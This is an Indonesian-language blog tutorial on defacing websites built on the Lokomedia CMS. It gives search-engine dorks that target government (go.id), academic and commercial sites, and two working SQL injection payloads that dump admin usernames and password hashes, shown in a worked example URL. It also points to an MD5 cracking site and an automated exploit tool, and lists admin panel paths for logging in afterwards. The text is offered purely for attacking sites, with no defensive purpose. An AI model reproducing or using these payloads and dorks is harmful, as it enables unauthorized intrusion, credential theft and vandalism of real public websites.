Cara Deface Dengan Sql Lokomedia

Halo ,kali ini saya akan membagikan tutorial deface  dengan sql lokomedia
 ok langsung aja ikuti steb by step langkahnya di bawah ini:

Dork 1 :

inurl:go.id inurl:statis- ext:html
inurl:ac.id inurl:statis- ext:html
inurl:com inurl:statis- ext:html

Exploit :

'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

Dork 2 :

inurl:go.id inurl:kategori- ext:html
inurl:ac.id inurl:kategori- ext:html
inurl:com inurl:kategori- ext:html

Exploit :

'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+---

Kembangin lagi ya :) biar dapet yang prawan :D , 

Contoh kalo kalian masih belum mengerti cara exploitnya ,
www.target.com/statis-1-pengantar.html maka apabila di  EXPLOIT  menjadi  :

www.target.com/statis--1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-pengantar.html

jangan lupa , Di depan angka 1 di kasih tanda setrip " - " ( tanpa tanda petik ) 
klo vuln nanti di titile websitenya ada username + paswordnya , tinggal pencet CTRL + U , liat di bagian titile

Oh iya gua lupa, ini link buat hash MD5 nya di sini

https://hashkiller.co.uk/md5-decrypter.aspx


Bisa juga pake ini tools punya Indoxploit fiturnya : Lokomedia (SQL Injection) + Auto Scan Admin Login + Auto Crack Password
langsung inject otomatis , terus cari admin login , intinya simple cuma masukin www.site.com doang, klo vuln nanti muncul user + pass ( harus di hash ) + admin login . simple kan ?

ini linknya

http://tools.indoxploit.or.id/?m=tools&tools=Lokomedia_Xploiter&act=show

login admin lokomedia , atau pake tools admin finder Disini

/redaktur
/adminweb
/administrator
/redaktur/index.php
/adminlogin
/admin
/login.php
/po-admin
/redakturweb
login@web
/adminpanel
/redaksi
admin login :
/adminweb
/admin
/login
/redaktur
/redakturweb
/administrator
/login@web
/adminpanel
/moderator
/operator
/webmaster

Share this post